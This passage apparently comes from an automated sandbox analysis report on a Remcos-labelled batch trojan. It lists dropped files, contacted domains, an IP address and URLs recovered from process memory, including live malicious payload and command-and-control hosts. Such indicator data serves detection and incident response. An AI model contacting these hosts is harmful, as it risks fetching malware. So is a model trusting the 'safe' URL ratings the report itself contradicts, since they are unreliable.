time measurements 45->100 48 cmd.exe 1 45->48         started        process17 process18 50 conhost.exe 48->50         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          A1 igazol#U00e1s.cmd16%ReversingLabsScript-BAT.Trojan.Remcos

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\Libraries\AnyDesk.PIF100%Joe Sandbox ML
          C:\Users\Public\alpha.exe0%ReversingLabs
          C:\Users\Public\alpha.pif0%ReversingLabs
          C:\Users\Public\kn.exe0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.askabirokulmumkun.onlineReferer:0%Avira URL Cloudsafe
          http://www.askabirokulmumkun.online/d05n/www.ultangaziescortbayanlari.online0%Avira URL Cloudsafe
          http://www.askabirokulmumkun.online0%Avira URL Cloudsafe
          http://www.9838.xyz/d05n/www.xc31.top0%Avira URL Cloudsafe
          http://www.trl-migrate.online/d05n/www.9838.xyz0%Avira URL Cloudsafe
          http://www.rnuah.xyz/d05n/0%Avira URL Cloudsafe
          http://www.evelupcasino.club/d05n/0%Avira URL Cloudsafe
          http://www.xc31.top/d05n/0%Avira URL Cloudsafe
          http://www.ursing-caregiver-jobs-za-3.bond/d05n/0%Avira URL Cloudsafe
          http://www.trl-migrate.online/d05n/0%Avira URL Cloudsafe
          http://www.estspacefox.shopReferer:0%Avira URL Cloudsafe
          http://www.826mza.top0%Avira URL Cloudsafe
          http://www.trl-migrate.onlineReferer:0%Avira URL Cloudsafe
          http://www.trl-migrate.online0%Avira URL Cloudsafe
          http://www.ebsiteclients.online/d05n/www.rnuah.xyz0%Avira URL Cloudsafe
          http://www.yzsports200.xyz/d05n/www.evelupcasino.club0%Avira URL Cloudsafe
          www.atingdilse.site/d05n/0%Avira URL Cloudsafe
          http://www.826mza.top/d05n/www.ursing-caregiver-jobs-za-3.bond0%Avira URL Cloudsafe
          http://www.9838.xyz0%Avira URL Cloudsafe
          http://www.ustavoglins.store/d05n/0%Avira URL Cloudsafe
          http://www.evelupcasino.clubReferer:0%Avira URL Cloudsafe
          http://www.ursing-caregiver-jobs-za-3.bond0%Avira URL Cloudsafe
          http://www.ustavoglins.storeReferer:0%Avira URL Cloudsafe
          http://www.9838.xyz/d05n/0%Avira URL Cloudsafe
          http://www.evelupcasino.club0%Avira URL Cloudsafe
          http://www.826mza.top/d05n/0%Avira URL Cloudsafe
          http://www.ustavoglins.store0%Avira URL Cloudsafe
          http://www.ultangaziescortbayanlari.online/d05n/www.yzsports200.xyz0%Avira URL Cloudsafe
          http://www.ybzert.online/d05n/www.trl-migrate.online0%Avira URL Cloudsafe
          http://www.atingdilse.siteReferer:0%Avira URL Cloudsafe
          http://www.yzsports200.xyz/d05n/0%Avira URL Cloudsafe
          https://aquadream.rs/244_Ipkokioahlpx0%Avira URL Cloudsafe
          http://www.estspacefox.shop0%Avira URL Cloudsafe
          http://www.atingdilse.site/d05n/0%Avira URL Cloudsafe
          http://www.yzsports200.xyzReferer:0%Avira URL Cloudsafe
          http://www.estspacefox.shop/d05n/www.ebsiteclients.online0%Avira URL Cloudsafe
          http://www.ustavoglins.store/d05n/www.estspacefox.shop0%Avira URL Cloudsafe
          http://www.ultangaziescortbayanlari.online/d05n/0%Avira URL Cloudsafe
          http://www.nilink.educationReferer:0%Avira URL Cloudsafe
          http://www.xc31.top0%Avira URL Cloudsafe
          https://aquadream.rs:443/244_Ipkokioahlp0%Avira URL Cloudsafe
          http://www.rnuah.xyzReferer:0%Avira URL Cloudsafe
          http://www.atingdilse.site/d05n/www.askabirokulmumkun.online0%Avira URL Cloudsafe
          https://aquadream.rs/244_Ipkokioahlp0%Avira URL Cloudsafe
          http://www.yzsports200.xyz0%Avira URL Cloudsafe
          http://www.atingdilse.site0%Avira URL Cloudsafe
          http://www.ebsiteclients.online0%Avira URL Cloudsafe
          http://www.ebsiteclients.onlineReferer:0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          aquadream.rs
          		185.102.77.43
          		truetrue
            		unknown
            www.ustavoglins.store
            		unknown
            		unknowntrue
              		unknown
              www.rnuah.xyz
              		unknown
              		unknowntrue
                		unknown
                www.9838.xyz
                		unknown
                		unknowntrue
                  		unknown
                  www.trl-migrate.online
                  		unknown
                  		unknowntrue
                    		unknown
                    www.ebsiteclients.online
                    		unknown
                    		unknowntrue
                      		unknown
                      www.atingdilse.site
                      		unknown
                      		unknowntrue
                        		unknown
                        www.askabirokulmumkun.online
                        		unknown
                        		unknowntrue
                          		unknown
                          www.yzsports200.xyz
                          		unknown
                          		unknowntrue
                            		unknown
                            www.ultangaziescortbayanlari.online
                            		unknown
                            		unknowntrue
                              		unknown
                              www.evelupcasino.club
                              		unknown
                              		unknowntrue
                                		unknown
                                www.estspacefox.shop
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  www.atingdilse.site/d05n/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://aquadream.rs/244_Ipkokioahlptrue
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.askabirokulmumkun.onlineexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://login.microsoftonline.com/%s/oauth2/authorizekn.exefalse
                                    		high
                                    https://powerpoint.office.comerexplorer.exe, 00000012.00000002.3879092352.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      https://android.notify.windows.com/iOSA4explorer.exe, 00000012.00000002.3879092352.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285822156.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.askabirokulmumkun.onlineReferer:explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.xc31.top/d05n/explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.rnuah.xyz/d05n/explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3876463266.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1548457580.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.askabirokulmumkun.online/d05n/www.ultangaziescortbayanlari.onlineexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.trl-migrate.online/d05n/www.9838.xyzexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://excel.office.comexplorer.exe, 00000012.00000002.3879092352.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://enterpriseregistration.windows.net/EnrollmentServer/key/kn.exefalse
                                                        		high
                                                        http://www.9838.xyz/d05n/www.xc31.topexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.evelupcasino.club/d05n/explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.trl-migrate.online/d05n/explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.ursing-caregiver-jobs-za-3.bond/d05n/explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.yzsports200.xyz/d05n/www.evelupcasino.clubexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.microsoft.cexplorer.exe, 00000012.00000000.1548457580.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3876463266.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.0000000009237000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://android.notify.windows.com/iOSdexplorer.exe, 00000012.00000002.3879092352.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285822156.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.trl-migrate.onlineexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.826mza.topexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.ebsiteclients.online/d05n/www.rnuah.xyzexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.estspacefox.shopReferer:explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.ybzert.onlineexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.trl-migrate.onlineReferer:explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.826mza.top/d05n/www.ursing-caregiver-jobs-za-3.bondexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://outlook.comexplorer.exe, 00000012.00000002.3879092352.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.9838.xyzexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.ustavoglins.store/d05n/explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://android.notify.windows.com/iOSexplorer.exe, 00000012.00000002.3879092352.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285822156.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000012.00000002.3879092352.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285822156.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.evelupcasino.clubReferer:explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.9838.xyz/d05n/explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.ustavoglins.storeReferer:explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.ustavoglins.storeexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
